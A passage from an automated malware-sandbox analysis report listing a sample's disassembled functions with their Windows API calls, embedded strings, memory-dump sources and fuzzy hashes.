                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                  • Opcode ID: 2335cabf592d60a35f7a255e16f82f1d93022b6a74741194c0e1c9b7cf716b19
                                                                                                                                  • Instruction ID: 90f72586b0f1f8a489c891e8a2cbc4025096a99dc7b4c62a460ba2897447611c
                                                                                                                                  • Opcode Fuzzy Hash: 2335cabf592d60a35f7a255e16f82f1d93022b6a74741194c0e1c9b7cf716b19
                                                                                                                                  • Instruction Fuzzy Hash: 5B018130500708AFEB31DB10DD4EB9677B8FF00B09F08126AF187B51E0DBF4A9469A40
                                                                                                                                  Function 00EBB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EndPath.GDI32(?), ref: 00EBB526
                                                                                                                                  • StrokeAndFillPath.GDI32(?,?,00F1F583,00000000,?), ref: 00EBB542
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00EBB555
                                                                                                                                  • DeleteObject.GDI32 ref: 00EBB568
                                                                                                                                  • StrokePath.GDI32(?), ref: 00EBB583
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                  • Opcode ID: 124de2cc56697143c106d70aeacff24b5e9510102f8d8d0322b79e80924d327d
                                                                                                                                  • Instruction ID: 452d4962521862cd051c2befd4de4499249f436100129ad46e61f8d184321068
                                                                                                                                  • Opcode Fuzzy Hash: 124de2cc56697143c106d70aeacff24b5e9510102f8d8d0322b79e80924d327d
                                                                                                                                  • Instruction Fuzzy Hash: F0F0C43000120CABDB269F65ED087A53FF6BB01326F188214E4A95A1F4C7B089A6FF15
                                                                                                                                  Function 00EEFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EEFAB2
                                                                                                                                  • CoCreateInstance.COMBASE(00F2DA7C,00000000,00000001,00F2D8EC,?), ref: 00EEFACA
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EEFD2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                  • String ID: .lnk
                                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                                  • Opcode ID: 7303a3bf483daee08f4854c789bfc894e463946ec86110df29654e2a99778d9e
                                                                                                                                  • Instruction ID: 5bcaf40a7bfb01e8a9baa8c698a58b657101a40d272865146524ce9646722d3e
                                                                                                                                  • Opcode Fuzzy Hash: 7303a3bf483daee08f4854c789bfc894e463946ec86110df29654e2a99778d9e
                                                                                                                                  • Instruction Fuzzy Hash: 61A14D72504205AFD300EF54CC91EABB7ECEF99714F40491DF255AB1A1EB70EA09CBA2
                                                                                                                                  Function 00EBDA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #$+
                                                                                                                                  • API String ID: 0-2552117581
                                                                                                                                  • Opcode ID: 56908ff59a7bb38a0c7147dae2b0a997e4785933a750dbd4256331b66f068b21
                                                                                                                                  • Instruction ID: 32f50cfd829bf6dd018ae447da441b2a4758da14640b57eec1766bc4b9a31f72
                                                                                                                                  • Opcode Fuzzy Hash: 56908ff59a7bb38a0c7147dae2b0a997e4785933a750dbd4256331b66f068b21
                                                                                                                                  • Instruction Fuzzy Hash: 1D513875908286CFDF15DF68C891AFA7BA0EF5A320F144055F851AB2D0E734ADC2E720
                                                                                                                                  Function 00EE503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00F3DC40,?,0000000F,0000000C,00000016,00F3DC40,?), ref: 00EE507B
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                    • Part of subcall function 00EAB8A7: _memmove.LIBCMT ref: 00EAB8FB
                                                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00EE50FB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                  • String ID: REMOVE$THIS
                                                                                                                                  • API String ID: 2528338962-776492005
                                                                                                                                  • Opcode ID: 160ed8891f189f03e2eb6087129562eaa2d5221e5d2f165a65d3db8619d9490b
                                                                                                                                  • Instruction ID: 979776772c4a62a0b0d3cdb84475a71c9cdc1d00346572157529e2dd682a049e
                                                                                                                                  • Opcode Fuzzy Hash: 160ed8891f189f03e2eb6087129562eaa2d5221e5d2f165a65d3db8619d9490b
                                                                                                                                  • Instruction Fuzzy Hash: 8F41B136A00A4D9FCF14DF55C881AAEB7F5BF49308F049069E856BB392DB34AD41CB40
                                                                                                                                  Function 00EDCF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EDC9FE,?,?,00000034,00000800,?,00000034), ref: 00EE4D6B
                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EDCFC9
                                                                                                                                    • Part of subcall function 00EE4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EDCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00EE4D36
                                                                                                                                    • Part of subcall function 00EE4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00EE4C90
                                                                                                                                    • Part of subcall function 00EE4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EDC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00EE4CA0
                                                                                                                                    • Part of subcall function 00EE4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EDC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00EE4CB6
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EDD036
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EDD083
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                  • Opcode ID: 06135eb828aa5285acbc2e40258b7ee7bd3f013e8207e5373db1b3495bc19713
                                                                                                                                  • Instruction ID: 1074cf17ad29ff9602be729b666237d9a293c56b4fda144f1dd283b90496b9b5
                                                                                                                                  • Opcode Fuzzy Hash: 06135eb828aa5285acbc2e40258b7ee7bd3f013e8207e5373db1b3495bc19713
                                                                                                                                  • Instruction Fuzzy Hash: AF414DB290021CAFDB11DFA4CC81FDEBBB9EF49700F108095EA45B7181DA716E45CBA1
                                                                                                                                  Function 00F0A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F3DBF0,00000000,?,?,?,?), ref: 00F0A4E6
                                                                                                                                  • GetWindowLongW.USER32 ref: 00F0A503
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F0A513
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long
                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                  • Opcode ID: e23194590d96fd5979cc79be325085ba548b6aa2a6722d7b0e695fdf670f0617
                                                                                                                                  • Instruction ID: 668f7d3c405ffd2fae4a3e1a93d7bef1c312034c1bb48587053899e5bc0f6a64
                                                                                                                                  • Opcode Fuzzy Hash: e23194590d96fd5979cc79be325085ba548b6aa2a6722d7b0e695fdf670f0617
                                                                                                                                  • Instruction Fuzzy Hash: B231AD39600609AFDB219E38CC45BEA7BA9FB49334F244725F875A31E0D770E851BB51
                                                                                                                                  Function 00EF57D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EF57E7
                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00EF581D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                  • String ID: ?K$|
                                                                                                                                  • API String ID: 1413715105-747655002
                                                                                                                                  • Opcode ID: add135506051a774a0940e446092b2aa8f0ca8fcce765bc7afef99c2209f601b
                                                                                                                                  • Instruction ID: 3059c7c4195e6ee003ff9c6e876199315f59fc13a825ef6c8d32d5b411c80c14
                                                                                                                                  • Opcode Fuzzy Hash: add135506051a774a0940e446092b2aa8f0ca8fcce765bc7afef99c2209f601b
                                                                                                                                  • Instruction Fuzzy Hash: 92315D72800209EBDF15AFA0CD85EEEBFB8FF19340F105029F915B6162DB319906CB60
                                                                                                                                  Function 00F0A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F0A74F
                                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F0A75D
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F0A764
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                                  • Opcode ID: 9d16392287f6e84a3960f187e7ba7dc0bc62390c3594a4d9cdb76eda3645682e
                                                                                                                                  • Instruction ID: 15e229c8e864edc3316bac82357160b19308812eb670149c706531e9ed9a1cb3
                                                                                                                                  • Opcode Fuzzy Hash: 9d16392287f6e84a3960f187e7ba7dc0bc62390c3594a4d9cdb76eda3645682e
                                                                                                                                  • Instruction Fuzzy Hash: AE2192B5600209AFDB10DF64CCC1EA737BDFB5A3A4B144459FA119B291C771EC11EA61
                                                                                                                                  Function 00F097B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F0983D
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F0984D
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F09872
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                  • String ID: Listbox
                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                  • Opcode ID: d1b1680bfe4784090f04e025aa5bb585130a9d0783197283b05e342b7c1c5da9
                                                                                                                                  • Instruction ID: cdb0d19285ef8a2ce602ee22c3fcd6b151071d89aec6d203767fecc4a1c37828
                                                                                                                                  • Opcode Fuzzy Hash: d1b1680bfe4784090f04e025aa5bb585130a9d0783197283b05e342b7c1c5da9
                                                                                                                                  • Instruction Fuzzy Hash: E8210732614118BFEF218F54CC85FEB3BAAEF89764F018124F9145B1D1D6B19C51BBA0
                                                                                                                                  Function 00F0A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F0A27B
                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F0A290
                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F0A29D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                  • Opcode ID: 9f73959dfc25cdac5f94ef8427f64812fe818c18cd2f6fde21e052f02ac05090
                                                                                                                                  • Instruction ID: 83abec3c0eb212a9db4a7751383fa4c6458ab65595a1a390878763fa2b99585f
                                                                                                                                  • Opcode Fuzzy Hash: 9f73959dfc25cdac5f94ef8427f64812fe818c18cd2f6fde21e052f02ac05090
                                                                                                                                  • Instruction Fuzzy Hash: C111E371204308BAEB205F65CC46FE73BA9EF88B64F114128FA55A60D0D272E851FB60
                                                                                                                                  Function 00EC2F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00EC2F79
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00EC2F80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                                  • API String ID: 2574300362-340411864
                                                                                                                                  • Opcode ID: 4102480563299b6f192bb0b17c68aaefb4d5b0f257fa75d1981e9a17404375b1
                                                                                                                                  • Instruction ID: e520e828b2a210b93c2f34313a951c462f265c1fa10cd42854056c5ffc9d6d57
                                                                                                                                  • Opcode Fuzzy Hash: 4102480563299b6f192bb0b17c68aaefb4d5b0f257fa75d1981e9a17404375b1
                                                                                                                                  • Instruction Fuzzy Hash: AAE01A7069431CABEB606F70ED4AF563A64B70270AF600428F212E10E0DBF98061FF05
                                                                                                                                  Function 00EC3034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EC2F4E), ref: 00EC304E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00EC3055
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                  • API String ID: 2574300362-2819208100
                                                                                                                                  • Opcode ID: 49821cff8a38523eba268b1b67d16726ed5d2cfa3fd96fc935abfd072f415af3
                                                                                                                                  • Instruction ID: f4badf2d41195127ea620db2efe0b72fd410b83137bd378c5e010d972498ccea
